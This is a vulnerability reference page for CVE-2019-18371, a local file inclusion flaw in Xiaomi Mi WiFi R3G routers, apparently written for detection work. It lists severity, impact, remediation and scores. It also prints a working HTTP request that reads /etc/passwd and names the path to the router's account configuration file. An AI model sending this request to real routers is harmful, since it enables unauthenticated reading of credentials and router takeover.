🔙 목록으로 돌아가기

CVE-2019-18371: Xiaomi Mi WiFi R3G Routers - Local file Inclusion

TitleXiaomi Mi WiFi R3G Routers - Local file Inclusion
Authorritikchaddha
SeverityHigh
ImpactUnauthenticated attackers can bypass authentication and read arbitrary files including configuration files containing credentials, potentially leading to complete router compromise.
RemediationUpdate the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.91982
CVE IDCVE-2019-18371
CWE IDCWE-22
Tags cve2019 cve lfi router mi xiaomi vkev vuln

🔍 Vulnerability Description

Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.

🌐 HTTP Request

GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18371.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-18371.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A